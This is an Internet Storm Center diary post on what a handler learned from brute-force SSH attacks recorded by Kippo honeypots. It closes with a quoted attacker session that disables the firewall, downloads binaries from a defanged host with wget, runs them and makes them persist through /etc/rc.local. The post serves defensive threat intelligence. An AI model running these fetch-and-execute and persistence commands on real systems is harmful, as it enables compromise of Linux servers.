Lessons Learn from attacks on Kippo honeypots

Published: 2014-11-10
Last Updated: 2014-11-10 23:54:14 UTC
by Chris Mohan (Version: 1)
3 comment(s)

A number of my fellow Handlers have discussed Kippo [1], a SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is randomly predictable; a mixture of known bad IP ranges, researchers or from behind TOR scanning and probing, would be attackers manually entering information from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day.Despite the IP addresses of the scans, the pickup file locations and the downloaded file names being different the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippo’s fake system

“So what?” you may ask. I like to draw lessons learnt from this type of honeypot interaction which help provide some tactical and operational intelligence that can be passed other teams to use. Don’t limit this type of information gather to just the security teams, for example our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks to keep them current and well advised. A single line note on a daily report to the stakeholders for security may being in order if your organisation is running internet facing Linux systems with SSH running  port TCP 22 for awareness.

Here are some of the one I detailed that would be passed to the security team.

1)    The password 12345 isn’t very safe – who knew? (implied sarcasm)
2)     The adversary was a scripted session with no error checking (see the script’s actions below)
3)    The roughly two hours attacks from each unique IP address shows a lack of centralised command and control
4)    The malware dropped was being reported in VirusTotal a day before I submitted my copies, so this most likely is a relatively new set of scanning and attacks
5)    The target of the attack is to compromise Linux systems
6)    The adversary hosting file locations are on Windows systems based in China running HFS v2.3c 291 [4] – a free windows web server on port 8889 – which has a known Remote Command Execution flaw the owner should probably looked at updating….
7)    Running static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8)    The IP addresses of the scanning and host servers
9)    And a nice list of usernames and passwords to be added to the never, ever use these of anything (root/root, root/password, admin/admin etc)

I’d normally offer up any captured binaries for further analysis, if the teams had the capacity to do this or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard coded commands, IP addresses, domain names etc) 

If you have any other comments on how to make honeypots' collections relevant, please drop me a line! 

Chris Mohan --- Internet Storm Center Handler on Duty

Recorded commands by Kippo 
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./ badfile1 &
cd /tmp
tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./ badfile2 &
bash: ./ badfile2: command not found
/tmp# cd /tmp
/tmp# echo "cd  /root/">>/etc/rc.local
cd  /root/>>/etc/rc.local
/tmp# echo "./ badfile1&">>/etc/rc.local
./ badfile1&>>/etc/rc.local
/tmp# echo "./ badfile2&">>/etc/rc.local
./ux badfile2&>>/etc/rc.local
/tmp# echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop>>/etc/rc.local


[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.  https://github.com/desaster/kippo

[2] File hash 1 0601aa569d59175733db947f17919bb7 https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b https://www.virustotal.com/en/file/f84ff1fb5cf8c0405dd6218bc9ed1d3562bf4f3e08fbe23f3982bfd4eb792f4d/analysis/ 

[4] http://sourceforge.net/projects/hfs/
[5] http://www.cuckoosandbox.org/

Keywords: kippo
3 comment(s)
ISC StormCast for Monday, November 10th 2014 http://isc.sans.edu/podcastdetail.html?id=4229


Diary Archives